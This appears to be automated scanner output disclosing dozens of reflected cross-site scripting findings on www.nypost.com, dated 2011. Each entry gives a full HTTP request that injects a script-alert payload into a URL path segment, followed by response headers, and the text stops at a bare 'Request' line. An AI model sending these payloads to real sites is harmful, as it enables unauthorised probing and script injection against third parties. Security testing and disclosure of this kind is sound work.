GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css1be2f<script>alert(1)</script>dd560a15c03 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:29 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 342a4<script>alert(1)</script>2d497ed0848 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig342a4<script>alert(1)</script>2d497ed0848/WebPortal/nypost/blocks/weather/weather.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:14 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcab8<script>alert(1)</script>fad90052008 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortalfcab8<script>alert(1)</script>fad90052008/nypost/blocks/weather/weather.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:16 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f05d2<script>alert(1)</script>8125c0cbbdc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostf05d2<script>alert(1)</script>8125c0cbbdc/blocks/weather/weather.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:18 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5b935<script>alert(1)</script>ed6165a3cd1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks5b935<script>alert(1)</script>ed6165a3cd1/weather/weather.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:21 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ea0bd<script>alert(1)</script>20c0fe209e3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/weatherea0bd<script>alert(1)</script>20c0fe209e3/weather.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:23 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 548c6<script>alert(1)</script>71b9c8ef2a6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css548c6<script>alert(1)</script>71b9c8ef2a6 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:28 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 947af<script>alert(1)</script>23c32321376 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig947af<script>alert(1)</script>23c32321376/WebPortal/nypost/css/home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:22 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5e3c2<script>alert(1)</script>d07d7cf6712 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal5e3c2<script>alert(1)</script>d07d7cf6712/nypost/css/home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:24 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f77af<script>alert(1)</script>f8dcfe35e3f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostf77af<script>alert(1)</script>f8dcfe35e3f/css/home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:26 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a3a59<script>alert(1)</script>31c009fa7ac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/cssa3a59<script>alert(1)</script>31c009fa7ac/home.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:27 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 543cf<script>alert(1)</script>3db549e2cb1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/css/home.css543cf<script>alert(1)</script>3db549e2cb1 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:33 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5756b<script>alert(1)</script>40a0af1717f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig5756b<script>alert(1)</script>40a0af1717f/WebPortal/nypost/css/home_default.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:26 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 627ec<script>alert(1)</script>050937d8794 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal627ec<script>alert(1)</script>050937d8794/nypost/css/home_default.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:28 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e586c<script>alert(1)</script>bab62a0f4d1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nyposte586c<script>alert(1)</script>bab62a0f4d1/css/home_default.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:31 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 28e19<script>alert(1)</script>d2f4df373bd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/css28e19<script>alert(1)</script>d2f4df373bd/home_default.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:33 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3dee8<script>alert(1)</script>c016ce8d31b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/css/home_default.css3dee8<script>alert(1)</script>c016ce8d31b HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:35 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17cbb<script>alert(1)</script>90941141b50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig17cbb<script>alert(1)</script>90941141b50/WebPortal/nypost/css/jquery.jcarousel.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:37 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ce3c1<script>alert(1)</script>428ee219182 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortalce3c1<script>alert(1)</script>428ee219182/nypost/css/jquery.jcarousel.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:40 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4f55c<script>alert(1)</script>556fea41cc7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost4f55c<script>alert(1)</script>556fea41cc7/css/jquery.jcarousel.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:41 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6811e<script>alert(1)</script>1423b347ed was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/css6811e<script>alert(1)</script>1423b347ed/jquery.jcarousel.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:43 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d1d78<script>alert(1)</script>c9be5fa64ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.cssd1d78<script>alert(1)</script>c9be5fa64ab HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:45 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c03a1<script>alert(1)</script>c47687d3e5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigc03a1<script>alert(1)</script>c47687d3e5d/WebPortal/nypost/css/misc.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:39:53 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 859f8<script>alert(1)</script>d404ef66d51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal859f8<script>alert(1)</script>d404ef66d51/nypost/css/misc.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:39:55 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 28f83<script>alert(1)</script>6a39e4a7d89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost28f83<script>alert(1)</script>6a39e4a7d89/css/misc.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:00 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fa5ef<script>alert(1)</script>7912646ce1d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/cssfa5ef<script>alert(1)</script>7912646ce1d/misc.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:03 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c5508<script>alert(1)</script>61c3a40e97a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/css/misc.cssc5508<script>alert(1)</script>61c3a40e97a HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:05 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96692<script>alert(1)</script>d11ded032fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig96692<script>alert(1)</script>d11ded032fd/WebPortal/nypost/css/styles.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 707 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:39:49 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f4d1<script>alert(1)</script>2ec7cf7cb7e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal5f4d1<script>alert(1)</script>2ec7cf7cb7e/nypost/css/styles.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 707 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:39:51 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c8dc9<script>alert(1)</script>b187d57790e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostc8dc9<script>alert(1)</script>b187d57790e/css/styles.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 707 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:39:53 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c4778<script>alert(1)</script>0dea580f227 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
